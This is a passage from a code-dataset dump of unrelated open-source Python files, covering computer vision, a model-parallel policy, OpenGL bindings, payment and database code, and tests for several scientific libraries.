# # flip the channel, since the original one using cv2
# # rgb -> bgr
# im = im[:, :, ::-1]
if roidb[i]['flipped']:
im = im[:, ::-1, :]
target_size = cfg.TRAIN.SCALES[scale_inds[i]]
im, im_scale = blob_utils.prep_im_for_blob(
im, cfg.PIXEL_MEANS, [target_size], cfg.TRAIN.MAX_SIZE)
im_scales.append(im_scale[0])
processed_ims.append(im[0])
# Create a blob to hold the input images [n, c, h, w]
blob = blob_utils.im_list_to_blob(processed_ims)
return blob, im_scales
def _project_im_rois(im_rois, im_scale_factor):
"""Project image RoIs into the rescaled training image."""
rois = im_rois * im_scale_factor
return rois
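# Illustrative call sketch (not part of the module): a single-image roidb entry
# with the fields used above; the image path and boxes are placeholders, and the
# global cfg from core.config is assumed to be loaded.
#
#   roidb = [{
#       'image': '/data/VOC2007/JPEGImages/000001.jpg',
#       'flipped': False,
#       'boxes': np.array([[10, 10, 100, 100]], dtype=np.float32),
#       'gt_classes': np.zeros((1, 20), dtype=np.float32),
#   }]
#   blobs, valid = get_minibatch(roidb, num_classes=20)
#   # blobs['data']: image blob; blobs['rois']: [batch_idx, x1, y1, x2, y2]; blobs['labels']: image labels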
|
parallelformers/policies/gptj.py | Oaklight/parallelformers | 454 | 22059 | <reponame>Oaklight/parallelformers
# Copyright 2021 TUNiB inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from transformers.models.gptj.modeling_gptj import GPTJBlock
from parallelformers.policies.base import Layer, Policy
from parallelformers.utils import AllReduceLinear
class GPTJPolicy(Policy):
@staticmethod
def replace_arguments(config, world_size):
return {
# 1. reduce hidden size
"attn.embed_dim": config.hidden_size // world_size,
# 2. reduce number of heads
"attn.num_attention_heads": config.n_head // world_size,
}
@staticmethod
def attn_qkv():
return [
Layer(weight="attn.q_proj.weight"),
Layer(weight="attn.k_proj.weight"),
Layer(weight="attn.v_proj.weight"),
]
@staticmethod
def attn_out():
return [
Layer(
weight="attn.out_proj.weight",
replace=AllReduceLinear,
),
]
@staticmethod
def mlp_in():
return [
Layer(
weight="mlp.fc_in.weight",
bias="mlp.fc_in.bias",
),
]
@staticmethod
def mlp_out():
return [
Layer(
weight="mlp.fc_out.weight",
bias="mlp.fc_out.bias",
replace=AllReduceLinear,
),
]
@staticmethod
def original_layer_class():
return GPTJBlock
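# Quick behaviour sketch (illustrative): with tensor parallelism across two ranks,
# the per-rank attention width and head count are halved. `config` stands for a
# transformers GPTJConfig-like object exposing hidden_size and n_head.
#
#   GPTJPolicy.replace_arguments(config, world_size=2)
#   # -> {'attn.embed_dim': config.hidden_size // 2,
#   #     'attn.num_attention_heads': config.n_head // 2}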
|
deep-rl/lib/python2.7/site-packages/OpenGL/GL/ATI/text_fragment_shader.py | ShujaKhalid/deep-rl | 210 | 22065 | '''OpenGL extension ATI.text_fragment_shader
This module customises the behaviour of the
OpenGL.raw.GL.ATI.text_fragment_shader to provide a more
Python-friendly API
Overview (from the spec)
The ATI_fragment_shader extension exposes a powerful fragment
processing model that provides a very general means of expressing
fragment color blending and dependent texture address modification.
The processing is termed a fragment shader or fragment program and
is specifed using a register-based model in which there are fixed
numbers of instructions, texture lookups, read/write registers, and
constants.
ATI_fragment_shader provides a unified instruction set
for operating on address or color data and eliminates the
distinction between the two. That extension provides all the
interfaces necessary to fully expose this programmable fragment
processor in GL.
ATI_text_fragment_shader is a redefinition of the
ATI_fragment_shader functionality, using a slightly different
interface. The intent of creating ATI_text_fragment_shader is to
take a step towards treating fragment programs similar to other
programmable parts of the GL rendering pipeline, specifically
vertex programs. This new interface is intended to appear
similar to the ARB_vertex_program API, within the limits of the
feature set exposed by the original ATI_fragment_shader extension.
The most significant differences between the two extensions are:
(1) ATI_fragment_shader provides a procedural function call
interface to specify the fragment program, whereas
ATI_text_fragment_shader uses a textual string to specify
the program. The fundamental syntax and constructs of the
program "language" remain the same.
(2) The program object managment portions of the interface,
namely the routines used to create, bind, and delete program
objects and set program constants are managed
using the framework defined by ARB_vertex_program.
(3) ATI_fragment_shader refers to the description of the
programmable fragment processing as a "fragment shader".
In keeping with the desire to treat all programmable parts
of the pipeline consistently, ATI_text_fragment_shader refers
to these as "fragment programs". The name of the extension is
left as ATI_text_fragment_shader instead of
ATI_text_fragment_program in order to indicate the underlying
similarity between the API's of the two extensions, and to
differentiate it from any other potential extensions that
may be able to move even further in the direction of treating
fragment programs as just another programmable area of the
GL pipeline.
Although ATI_fragment_shader was originally conceived as a
device-independent extension that would expose the capabilities of
future generations of hardware, changing trends in programmable
hardware have affected the lifespan of this extension. For this
reason you will now find a fixed set of features and resources
exposed, and the queries to determine this set have been deprecated
in ATI_fragment_shader. Further, in ATI_text_fragment_shader,
most of these resource limits are fixed by the text grammar and
the queries have been removed altogether.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ATI/text_fragment_shader.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ATI.text_fragment_shader import *
from OpenGL.raw.GL.ATI.text_fragment_shader import _EXTENSION_NAME
def glInitTextFragmentShaderATI():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION |
powerline/lib/watcher/stat.py | MrFishFinger/powerline | 11,435 | 22089 | <gh_stars>1000+
# vim:fileencoding=utf-8:noet
from __future__ import (unicode_literals, division, absolute_import, print_function)
import os
from threading import RLock
from powerline.lib.path import realpath
class StatFileWatcher(object):
def __init__(self):
self.watches = {}
self.lock = RLock()
def watch(self, path):
path = realpath(path)
with self.lock:
self.watches[path] = os.path.getmtime(path)
def unwatch(self, path):
path = realpath(path)
with self.lock:
self.watches.pop(path, None)
def is_watching(self, path):
with self.lock:
return realpath(path) in self.watches
def __call__(self, path):
path = realpath(path)
with self.lock:
if path not in self.watches:
self.watches[path] = os.path.getmtime(path)
return True
mtime = os.path.getmtime(path)
if mtime != self.watches[path]:
self.watches[path] = mtime
return True
return False
def close(self):
with self.lock:
self.watches.clear()
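# Illustrative usage sketch (comments only; the path is a placeholder): calling
# the watcher reports True the first time a path is seen and again whenever its
# mtime changes.
#
#   watcher = StatFileWatcher()
#   watcher('/tmp/example.conf')   # True on first call
#   watcher('/tmp/example.conf')   # False until the file's mtime changes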
|
braintree/apple_pay_card.py | futureironman/braintree_python | 182 | 22109 | <filename>braintree/apple_pay_card.py
import braintree
from braintree.resource import Resource
class ApplePayCard(Resource):
"""
A class representing Braintree Apple Pay card objects.
"""
class CardType(object):
"""
Contants representing the type of the credit card. Available types are:
* Braintree.ApplePayCard.AmEx
* Braintree.ApplePayCard.MasterCard
* Braintree.ApplePayCard.Visa
"""
AmEx = "Apple Pay - American Express"
MasterCard = "Apple Pay - MasterCard"
Visa = "Apple Pay - Visa"
def __init__(self, gateway, attributes):
Resource.__init__(self, gateway, attributes)
if hasattr(self, 'expired'):
self.is_expired = self.expired
if "subscriptions" in attributes:
self.subscriptions = [braintree.subscription.Subscription(gateway, subscription) for subscription in self.subscriptions]
@property
def expiration_date(self):
return self.expiration_month + "/" + self.expiration_year
|
posthog/migrations/0087_fix_annotation_created_at.py | avoajaugochukwu/posthog | 7,409 | 22155 | # Generated by Django 3.0.7 on 2020-10-14 07:46
import django.utils.timezone
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
("posthog", "0086_team_session_recording_opt_in"),
]
operations = [
migrations.AlterField(
model_name="annotation",
name="created_at",
field=models.DateTimeField(default=django.utils.timezone.now, null=True),
),
]
|
api/tests/opentrons/protocol_engine/execution/test_run_control_handler.py | mrod0101/opentrons | 235 | 22179 | <reponame>mrod0101/opentrons
"""Run control side-effect handler."""
import pytest
from decoy import Decoy
from opentrons.protocol_engine.state import StateStore
from opentrons.protocol_engine.actions import ActionDispatcher, PauseAction
from opentrons.protocol_engine.execution.run_control import RunControlHandler
from opentrons.protocol_engine.state import EngineConfigs
@pytest.fixture
def state_store(decoy: Decoy) -> StateStore:
"""Get a mocked out StateStore."""
return decoy.mock(cls=StateStore)
@pytest.fixture
def action_dispatcher(decoy: Decoy) -> ActionDispatcher:
"""Get a mocked out ActionDispatcher."""
return decoy.mock(cls=ActionDispatcher)
@pytest.fixture
def subject(
state_store: StateStore,
action_dispatcher: ActionDispatcher,
) -> RunControlHandler:
"""Create a RunControlHandler with its dependencies mocked out."""
return RunControlHandler(
state_store=state_store,
action_dispatcher=action_dispatcher,
)
async def test_pause(
decoy: Decoy,
state_store: StateStore,
action_dispatcher: ActionDispatcher,
subject: RunControlHandler,
) -> None:
"""It should be able to execute a pause."""
decoy.when(state_store.get_configs()).then_return(EngineConfigs(ignore_pause=False))
await subject.pause()
decoy.verify(
action_dispatcher.dispatch(PauseAction()),
await state_store.wait_for(condition=state_store.commands.get_is_running),
)
async def test_pause_analysis(
decoy: Decoy,
state_store: StateStore,
action_dispatcher: ActionDispatcher,
subject: RunControlHandler,
) -> None:
"""It should no op during a protocol analysis."""
decoy.when(state_store.get_configs()).then_return(EngineConfigs(ignore_pause=True))
await subject.pause()
decoy.verify(action_dispatcher.dispatch(PauseAction()), times=0)
|
pmlearn/mixture/tests/test_dirichlet_process.py | john-veillette/pymc-learn | 187 | 22208 | import unittest
import shutil
import tempfile
import numpy as np
# import pandas as pd
# import pymc3 as pm
# from pymc3 import summary
# from sklearn.mixture import BayesianGaussianMixture as skBayesianGaussianMixture
from sklearn.model_selection import train_test_split
from pmlearn.exceptions import NotFittedError
from pmlearn.mixture import DirichletProcessMixture
class DirichletProcessMixtureTestCase(unittest.TestCase):
def setUp(self):
self.num_truncate = 3
self.num_components = 3
self.num_pred = 1
self.num_training_samples = 100
self.pi = np.array([0.35, 0.4, 0.25])
self.means = np.array([0, 5, 10])
self.sigmas = np.array([0.5, 0.5, 1.0])
self.components = np.random.randint(0,
self.num_components,
self.num_training_samples)
X = np.random.normal(loc=self.means[self.components],
scale=self.sigmas[self.components])
X.shape = (self.num_training_samples, 1)
self.X_train, self.X_test = train_test_split(X, test_size=0.3)
self.test_DPMM = DirichletProcessMixture()
self.test_nuts_DPMM = DirichletProcessMixture()
self.test_dir = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.test_dir)
# class DirichletProcessMixtureFitTestCase(DirichletProcessMixtureTestCase):
# def test_advi_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_DPMM.fit(self.X_train)
#
# self.assertEqual(self.num_pred, self.test_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_DPMM.num_components)
# self.assertEqual(self.num_truncate, self.test_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
# self.test_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
# def test_nuts_fit_returns_correct_model(self):
# # This print statement ensures PyMC3 output won't overwrite the test name
# print('')
# self.test_nuts_DPMM.fit(self.X_train,
# inference_type='nuts',
# inference_args={'draws': 1000,
# 'chains': 2})
#
# self.assertEqual(self.num_pred, self.test_nuts_DPMM.num_pred)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_components)
# self.assertEqual(self.num_components, self.test_nuts_DPMM.num_truncate)
#
# self.assertAlmostEqual(self.pi[0],
# self.test_nuts_DPMM.summary['mean']['pi__0'],
# 0)
# self.assertAlmostEqual(self.pi[1],
# self.test_nuts_DPMM.summary['mean']['pi__1'],
# 0)
# self.assertAlmostEqual(self.pi[2],
# self.test_nuts_DPMM.summary['mean']['pi__2'],
# 0)
#
# self.assertAlmostEqual(
# self.means[0],
# self.test_nuts_DPMM.summary['mean']['cluster_center_0__0'],
# 0)
# self.assertAlmostEqual(
# self.means[1],
# self.test_nuts_DPMM.summary['mean']['cluster_center_1__0'],
# 0)
# self.assertAlmostEqual(
# self.means[2],
# self.test_nuts_DPMM.summary['mean']['cluster_center_2__0'],
# 0)
#
# self.assertAlmostEqual(
# self.sigmas[0],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_0__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[1],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_1__0'],
# 0)
# self.assertAlmostEqual(
# self.sigmas[2],
# self.test_nuts_DPMM.summary['mean']['cluster_variance_2__0'],
# 0)
#
#
class DirichletProcessMixturePredictTestCase(DirichletProcessMixtureTestCase):
# def test_predict_returns_predictions(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds = self.test_DPMM.predict(self.X_test)
# self.assertEqual(self.y_test.shape, preds.shape)
# def test_predict_returns_mean_predictions_and_std(self):
# print('')
# self.test_DPMM.fit(self.X_train, self.y_train)
# preds, stds = self.test_DPMM.predict(self.X_test, return_std=True)
# self.assertEqual(self.y_test.shape, preds.shape)
# self.assertEqual(self.y_test.shape, stds.shape)
def test_predict_raises_error_if_not_fit(self):
print('')
with self.assertRaises(NotFittedError) as no_fit_error:
test_DPMM = DirichletProcessMixture()
test_DPMM.predict(self.X_train)
expected = 'Run fit on the model before predict.'
self.assertEqual(str(no_fit_error.exception), expected)
# class DirichletProcessMixtureScoreTestCase(DirichletProcessMixtureTestCase):
# def test_score_matches_sklearn_performance(self):
# print('')
# skDPMM = skBayesianGaussianMixture(n_components=3)
# skDPMM.fit(self.X_train)
# skDPMM_score = skDPMM.score(self.X_test)
#
# self.test_DPMM.fit(self.X_train)
# test_DPMM_score = self.test_DPMM.score(self.X_test)
#
# self.assertAlmostEqual(skDPMM_score, test_DPMM_score, 0)
#
#
# class DirichletProcessMixtureSaveAndLoadTestCase(DirichletProcessMixtureTestCase):
# def test_save_and_load_work_correctly(self):
# print('')
# self.test_DPMM.fit(self.X_train)
# score1 = self.test_DPMM.score(self.X_test)
# self.test_DPMM.save(self.test_dir)
#
# DPMM2 = DirichletProcessMixture()
# DPMM2.load(self.test_dir)
#
# self.assertEqual(self.test_DPMM.inference_type, DPMM2.inference_type)
# self.assertEqual(self.test_DPMM.num_pred, DPMM2.num_pred)
# self.assertEqual(self.test_DPMM.num_training_samples,
# DPMM2.num_training_samples)
# self.assertEqual(self.test_DPMM.num_truncate, DPMM2.num_truncate)
#
# pd.testing.assert_frame_equal(summary(self.test_DPMM.trace),
# summary(DPMM2.trace))
#
# score2 = DPMM2.score(self.X_test)
# self.assertAlmostEqual(score1, score2, 0)
|
utils/utils.py | cheng052/H3DNet | 212 | 22210 | <reponame>cheng052/H3DNet<gh_stars>100-1000
import torch
import torch.nn as nn
import torch.nn.functional as F
def conv3x3x3(in_planes, out_planes, stride):
# 3x3x3 convolution with padding
return nn.Conv3d(
in_planes,
out_planes,
kernel_size=3,
stride=stride,
padding=1)
def upconv3x3x3(in_planes, out_planes, stride):
return nn.ConvTranspose3d(
in_planes,
out_planes,
kernel_size=3,
stride=1,
padding=1,
output_padding=1)
def conv_block_3d(in_dim, out_dim, activation):
return nn.Sequential(
nn.Conv3d(in_dim, out_dim, kernel_size=3, stride=1, padding=1),
nn.BatchNorm3d(out_dim),
activation,)
def conv_trans_block_3d(in_dim, out_dim, activation, stride=2):
return nn.Sequential(
nn.ConvTranspose3d(in_dim, out_dim, kernel_size=3, stride=stride, padding=1, output_padding=1),
nn.BatchNorm3d(out_dim),
activation,)
def max_pooling_3d():
return nn.MaxPool3d(kernel_size=2, stride=2, padding=0)
def conv_block_2_3d(in_dim, out_dim, activation, stride=1):
return nn.Sequential(
conv_block_3d(in_dim, out_dim, activation),
nn.Conv3d(out_dim, out_dim, kernel_size=3, stride=stride, padding=1),
nn.BatchNorm3d(out_dim),)
|
tests/datasets/test_tonas.py | lucaspbastos/mirdata | 224 | 22239 | import numpy as np
from tests.test_utils import run_track_tests
from mirdata import annotations
from mirdata.datasets import tonas
TEST_DATA_HOME = "tests/resources/mir_datasets/tonas"
def test_track():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
expected_attributes = {
"singer": "<NAME>",
"style": "Debla",
"title": "<NAME>",
"tuning_frequency": 451.0654725341684,
"f0_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.f0.Corrected",
"notes_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.notes.Corrected",
"audio_path": "tests/resources/mir_datasets/tonas/Deblas/01-D_AMairena.wav",
"track_id": "01-D_AMairena",
}
expected_property_types = {
"f0": annotations.F0Data,
"f0_automatic": annotations.F0Data,
"f0_corrected": annotations.F0Data,
"notes": annotations.NoteData,
"audio": tuple,
"singer": str,
"style": str,
"title": str,
"tuning_frequency": float,
}
run_track_tests(track, expected_attributes, expected_property_types)
def test_to_jams():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
jam = track.to_jams()
# Validate cante100 jam schema
assert jam.validate()
# Validate melody
f0 = jam.search(namespace="pitch_contour")[0]["data"]
assert [note.time for note in f0] == [0.197, 0.209, 0.221, 0.232]
assert [note.duration for note in f0] == [0.0, 0.0, 0.0, 0.0]
assert [note.value for note in f0] == [
{"index": 0, "frequency": 0.0, "voiced": False},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
{"index": 0, "frequency": 379.299, "voiced": True},
]
print([note.confidence for note in f0])
assert [note.confidence for note in f0] == [3.09e-06, 2.86e-06, 7.15e-06, 1.545e-05]
# Validate note transciption
notes = jam.search(namespace="note_hz")[0]["data"]
assert [note.time for note in notes] == [
0.216667,
0.65,
2.183333,
2.566667,
]
assert [note.duration for note in notes] == [
0.433333,
1.016667,
0.3833329999999999,
0.3333330000000001,
]
assert [note.value for note in notes] == [
388.8382625732775,
411.9597888711769,
388.8382625732775,
411.9597888711769,
]
assert [note.confidence for note in notes] == [None, None, None, None]
def test_load_melody():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
f0_path = track.f0_path
f0_data_corrected = tonas.load_f0(f0_path, True)
f0_data_automatic = tonas.load_f0(f0_path, False)
# check types
assert type(f0_data_corrected) == annotations.F0Data
assert type(f0_data_corrected.times) is np.ndarray
assert type(f0_data_corrected.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_corrected._confidence) is np.ndarray
assert type(f0_data_automatic) == annotations.F0Data
assert type(f0_data_automatic.times) is np.ndarray
assert type(f0_data_automatic.frequencies) is np.ndarray
assert type(f0_data_corrected.voicing) is np.ndarray
assert type(f0_data_automatic._confidence) is np.ndarray
# check values
assert np.array_equal(
f0_data_corrected.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_corrected.frequencies, np.array([0.000, 379.299, 379.299, 379.299])
)
assert np.array_equal(
f0_data_corrected.voicing,
np.array([0.0, 1.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_corrected._confidence,
np.array([3.090e-06, 0.00000286, 0.00000715, 0.00001545]),
)
# check values
assert np.array_equal(
f0_data_automatic.times,
np.array([0.197, 0.209, 0.221, 0.232]),
)
assert np.array_equal(
f0_data_automatic.frequencies,
np.array(
[
0.000,
0.000,
143.918,
143.918,
]
),
)
assert np.array_equal(
f0_data_automatic.voicing,
np.array([0.0, 0.0, 1.0, 1.0]),
)
assert np.array_equal(
f0_data_automatic._confidence,
np.array([3.090e-06, 2.860e-06, 0.00000715, 0.00001545]),
)
def test_load_notes():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
notes_path = track.notes_path
notes_data = tonas.load_notes(notes_path)
tuning_frequency = tonas._load_tuning_frequency(notes_path)
# check types
assert type(notes_data) == annotations.NoteData
assert type(notes_data.intervals) is np.ndarray
assert type(notes_data.pitches) is np.ndarray
assert type(notes_data.confidence) is np.ndarray
assert type(tuning_frequency) is float
# check tuning frequency
assert tuning_frequency == 451.0654725341684
# check values
assert np.array_equal(
notes_data.intervals[:, 0], np.array([0.216667, 0.65, 2.183333, 2.566667])
)
assert np.array_equal(
notes_data.intervals[:, 1], np.array([0.65, 1.666667, 2.566666, 2.9])
)
assert np.array_equal(
notes_data.pitches,
np.array(
[388.8382625732775, 411.9597888711769, 388.8382625732775, 411.9597888711769]
),
)
assert np.array_equal(
notes_data.confidence,
np.array(
[
0.018007,
0.010794,
0.00698,
0.03265,
]
),
)
def test_load_audio():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
track = dataset.track(default_trackid)
audio_path = track.audio_path
audio, sr = tonas.load_audio(audio_path)
assert sr == 44100
assert type(audio) is np.ndarray
def test_metadata():
default_trackid = "01-D_AMairena"
dataset = tonas.Dataset(TEST_DATA_HOME)
metadata = dataset._metadata
assert metadata[default_trackid] == {
"title": "En el barrio de Triana",
"style": "Debla",
"singer": "<NAME>",
}
|
pyleus/configuration.py | earthmine/pyleus | 166 | 22245 | """Configuration defaults and loading functions.
Pyleus will look for configuration files in the following file paths in order
of increasing precedence. The latter configuration overrides the previous one.
#. /etc/pyleus.conf
#. ~/.config/pyleus.conf
#. ~/.pyleus.conf
You can always specify a configuration file when running any pyleus CLI command
as following:
``$ pyleus -c /path/to/config_file CMD``
This will override previous configurations.
Configuration file example
--------------------------
The following file contains all options you can configure for all pyleus
invocations.
.. code-block:: ini
[storm]
# path to Storm executable (pyleus will automatically look in PATH)
storm_cmd_path: /usr/share/storm/bin/storm
# optional: use -n option of pyleus CLI instead
nimbus_host: 10.11.12.13
# optional: use -p option of pyleus CLI instead
nimbus_port: 6628
# java options to pass to Storm CLI
jvm_opts: -Djava.io.tmpdir=/home/myuser/tmp
[build]
# PyPI server to use during the build of your topologies
pypi_index_url: http://pypi.ninjacorp.com/simple/
# always use system-site-packages for pyleus virtualenvs (default: false)
system_site_packages: true
# list of packages to always include in your topologies
include_packages: foo bar<4.0 baz==0.1
"""
from __future__ import absolute_import
import collections
import os
from pyleus import BASE_JAR_PATH
from pyleus.utils import expand_path
from pyleus.exception import ConfigurationError
from pyleus.compat import configparser
# Configuration files paths in order of increasing precedence
# Please keep in sync with module docstring
CONFIG_FILES_PATH = [
"/etc/pyleus.conf",
"~/.config/pyleus.conf",
"~/.pyleus.conf"
]
Configuration = collections.namedtuple(
"Configuration",
"base_jar config_file debug func include_packages output_jar \
pypi_index_url nimbus_host nimbus_port storm_cmd_path \
system_site_packages topology_path topology_jar topology_name verbose \
wait_time jvm_opts"
)
"""Namedtuple containing all pyleus configuration values."""
DEFAULTS = Configuration(
base_jar=BASE_JAR_PATH,
config_file=None,
debug=False,
func=None,
include_packages=None,
output_jar=None,
pypi_index_url=None,
nimbus_host=None,
nimbus_port=None,
storm_cmd_path=None,
system_site_packages=False,
topology_path="pyleus_topology.yaml",
topology_jar=None,
topology_name=None,
verbose=False,
wait_time=None,
jvm_opts=None,
)
def _validate_config_file(config_file):
"""Ensure that config_file exists and is a file."""
if not os.path.exists(config_file):
raise ConfigurationError("Specified configuration file not"
" found: {0}".format(config_file))
if not os.path.isfile(config_file):
raise ConfigurationError("Specified configuration file is not"
" a file: {0}".format(config_file))
def update_configuration(config, update_dict):
"""Update configuration with new values passed as dictionary.
:return: new configuration ``namedtuple``
"""
tmp = config._asdict()
tmp.update(update_dict)
return Configuration(**tmp)
def load_configuration(cmd_line_file):
"""Load configurations from the more generic to the
more specific configuration file. The latter configurations
override the previous one.
If a file is specified from command line, it is considered
the most specific.
:return: configuration ``namedtuple``
"""
config_files_hierarchy = [expand_path(c) for c in CONFIG_FILES_PATH]
if cmd_line_file is not None:
_validate_config_file(cmd_line_file)
config_files_hierarchy.append(cmd_line_file)
config = configparser.SafeConfigParser()
config.read(config_files_hierarchy)
configs = update_configuration(
DEFAULTS,
dict(
(config_name, config_value)
for section in config.sections()
for config_name, config_value in config.items(section)
)
)
return configs
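

# A minimal usage sketch (added for illustration; not part of the original module).
# load_configuration(None) merges only the default config file hierarchy, with later
# files overriding earlier ones; update_configuration overrides individual fields on
# the resulting Configuration namedtuple.
if __name__ == "__main__":
    example_config = load_configuration(None)
    example_config = update_configuration(example_config, {"verbose": True})
    print(example_config.topology_path, example_config.verbose)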
|
pymic/transform/threshold.py | HiLab-git/PyMIC | 147 | 22249 | <reponame>HiLab-git/PyMIC
# -*- coding: utf-8 -*-
from __future__ import print_function, division
import torch
import json
import math
import random
import numpy as np
from scipy import ndimage
from pymic.transform.abstract_transform import AbstractTransform
from pymic.util.image_process import *
class ChannelWiseThreshold(AbstractTransform):
"""Threshold the image (shape [C, D, H, W] or [C, H, W]) for each channel
"""
def __init__(self, params):
"""
channels (tuple/list/None): the list of specified channels for thresholding. Default value
is all the channels.
threshold_lower (tuple/list/None): The lower threshold values for specified channels.
        threshold_upper (tuple/list/None): The upper threshold values for specified channels.
        replace_lower (tuple/list/None): new values for pixels with intensity smaller than
            threshold_lower. Default value is threshold_lower.
        replace_upper (tuple/list/None): new values for pixels with intensity larger than
            threshold_upper. Default value is threshold_upper.
"""
super(ChannelWiseThreshold, self).__init__(params)
self.channlels = params['ChannelWiseThreshold_channels'.lower()]
self.threshold_lower = params['ChannelWiseThreshold_threshold_lower'.lower()]
self.threshold_upper = params['ChannelWiseThreshold_threshold_upper'.lower()]
self.replace_lower = params['ChannelWiseThreshold_replace_lower'.lower()]
self.replace_upper = params['ChannelWiseThreshold_replace_upper'.lower()]
self.inverse = params.get('ChannelWiseThreshold_inverse'.lower(), False)
def __call__(self, sample):
image= sample['image']
channels = range(image.shape[0]) if self.channlels is None else self.channlels
for i in range(len(channels)):
chn = channels[i]
if((self.threshold_lower is not None) and (self.threshold_lower[i] is not None)):
t_lower = self.threshold_lower[i]
r_lower = self.threshold_lower[i]
if((self.replace_lower is not None) and (self.replace_lower[i] is not None)):
r_lower = self.replace_lower[i]
image[chn][image[chn] < t_lower] = r_lower
if((self.threshold_upper is not None) and (self.threshold_upper[i] is not None)):
t_upper = self.threshold_upper[i]
r_upper = self.threshold_upper[i]
if((self.replace_upper is not None) and (self.replace_upper[i] is not None)):
r_upper= self.replace_upper[i]
image[chn][image[chn] > t_upper] = r_upper
sample['image'] = image
return sample
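
# A minimal usage sketch (hypothetical parameter values, added for illustration).
# The params dict uses lower-cased keys of the form '<transformname>_<option>', and
# thresholding is applied channel-wise to sample['image'] of shape [C, D, H, W] or [C, H, W]:
#
#   params = {
#       'channelwisethreshold_channels': [0],
#       'channelwisethreshold_threshold_lower': [0.0],
#       'channelwisethreshold_threshold_upper': [1000.0],
#       'channelwisethreshold_replace_lower': [0.0],
#       'channelwisethreshold_replace_upper': [1000.0],
#   }
#   transform = ChannelWiseThreshold(params)
#   sample = transform({'image': image})  # image: numpy array, channel-first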
class ChannelWiseThresholdWithNormalize(AbstractTransform):
"""
Note that this can be replaced by ChannelWiseThreshold + NormalizeWithMinMax
Threshold the image (shape [C, D, H, W] or [C, H, W]) for each channel
and then normalize the image based on remaining pixels
"""
def __init__(self, params):
"""
:param threshold_lower: (tuple/list/None) The lower threshold value along each channel.
        :param threshold_upper: (tuple/list/None) The upper threshold value along each channel.
        :param mean_std_mode: (bool) If true, normalize the image based on mean and std values,
            and pixel values outside the threshold range are replaced with random numbers.
            If false, use the min and max values for normalization.
"""
super(ChannelWiseThresholdWithNormalize, self).__init__(params)
self.threshold_lower = params['ChannelWiseThresholdWithNormalize_threshold_lower'.lower()]
self.threshold_upper = params['ChannelWiseThresholdWithNormalize_threshold_upper'.lower()]
self.mean_std_mode = params['ChannelWiseThresholdWithNormalize_mean_std_mode'.lower()]
self.inverse = params.get('ChannelWiseThresholdWithNormalize_inverse'.lower(), False)
def __call__(self, sample):
image= sample['image']
for chn in range(image.shape[0]):
v0 = self.threshold_lower[chn]
v1 = self.threshold_upper[chn]
if(self.mean_std_mode == True):
mask = np.ones_like(image[chn])
if(v0 is not None):
mask = mask * np.asarray(image[chn] > v0)
if(v1 is not None):
mask = mask * np.asarray(image[chn] < v1)
pixels = image[chn][mask > 0]
chn_mean = pixels.mean()
chn_std = pixels.std()
chn_norm = (image[chn] - chn_mean)/chn_std
chn_random = np.random.normal(0, 1, size = chn_norm.shape)
chn_norm[mask == 0] = chn_random[mask == 0]
image[chn] = chn_norm
else:
img_chn = image[chn]
if(v0 is not None):
img_chn[img_chn < v0] = v0
min_value = v0
else:
min_value = img_chn.min()
if(v1 is not None):
img_chn[img_chn > v1] = v1
max_value = img_chn.max()
else:
max_value = img_chn.max()
img_chn = (img_chn - min_value) / (max_value - min_value)
image[chn] = img_chn
sample['image'] = image
return sample |
